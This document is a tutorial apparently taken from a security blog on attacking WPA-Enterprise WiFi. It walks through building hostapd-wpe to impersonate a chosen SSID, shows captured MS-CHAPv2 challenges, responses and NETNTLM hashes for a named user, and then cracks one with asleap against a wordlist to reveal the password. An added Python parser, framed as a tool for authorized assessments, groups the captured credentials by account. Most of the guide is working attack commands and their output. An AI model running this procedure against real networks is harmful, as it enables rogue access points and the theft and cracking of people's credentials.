Cracking WiFi – Enterprise

This guide uses hostapd-wpe, which implements an IEEE 802.1X Authenticator and Authentication Server for impersonation attacks: it is used to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

Installation is relatively simple, but you might encounter some hiccups on Ubuntu/Debian/Kali. To help get you up and running, I've put together the following guide.

Installation

Install the dependencies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Build hostapd, generate the certificates, and open the configuration file:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
change interface=eth0 to interface=wlan0 (or the interface of your choosing)
change driver=wired to #driver=wired
uncomment all 802.11 options and define the SSID you wish to "man-in-the-middle"

Run the following to avoid errors on startup:
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648
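
The following parser is an added example, not part of the original post or of the hostapd-wpe project: it reads records in the hostapd-wpe.log layout above and builds a per-account list of clients that handed MS-CHAPv2 credentials to the test AP during an authorized assessment, which is the list of supplicants that need server-certificate validation fixed. The sample log, the jdoe record and the function names are my own constructions; a record cut off mid-way (as tail -f shows it) is dropped rather than mis-attributed.

```python
from datetime import datetime
# Constructed sample in the layout above: a cut-off record (as 'tail -f' shows it), pkelley's record, and a made-up jdoe record.
SAMPLE_LOG = """\
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
mschapv2: Wed Mar 11 11:21:03 2015
username: jdoe
challenge: 00:11:22:33:44:55:66:77
response: 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77
"""

def octets(value, n):
    """'d1:a3:..' -> bytes, requiring exactly n two-hex-digit octets."""
    parts = value.split(":")
    if len(parts) != n or any(len(p) != 2 for p in parts):
        raise ValueError(f"expected {n} octets, got {value!r}")
    return bytes.fromhex("".join(parts))  # raises ValueError on non-hex digits

def parse_wpe_log(text):
    """One dict per complete mschapv2 record; lines before the first header (a cut-off record) and 'jtr NETNTLM:' lines are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        key, _, value = (s.strip() for s in line.partition(":"))
        if key == "mschapv2":          # header line starts a new record
            cur = {"seen": datetime.strptime(value, "%a %b %d %H:%M:%S %Y")}
        elif cur is None:              # no header seen yet: cut-off record, drop it
            continue
        elif key == "username":
            cur["username"] = value
        elif key == "challenge":
            cur["challenge"] = octets(value, 8)   # 8-byte MS-CHAPv2 challenge
        elif key == "response":        # last line of a record
            cur["response"] = octets(value, 24)  # 24-byte NT-Response
            if "username" in cur and "challenge" in cur:
                records.append(cur)
            cur = None
    return records

def affected_accounts(records):
    """Per-account remediation view (attempts, time window): each listed client accepted the test AP's certificate and needs server-certificate validation fixed."""
    out = {}
    for r in records:
        e = out.setdefault(r["username"], {"attempts": 0, "first": r["seen"], "last": r["seen"]})
        e.update(attempts=e["attempts"] + 1, first=min(e["first"], r["seen"]), last=max(e["last"], r["seen"]))
    return out
```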

Use asleap to crack these passwords against a wordlist:
format: asleap -C <challenge> -R <response> -W <wordlist>

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "/opt/SecLists/Passwords/rockyou.txt".
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234
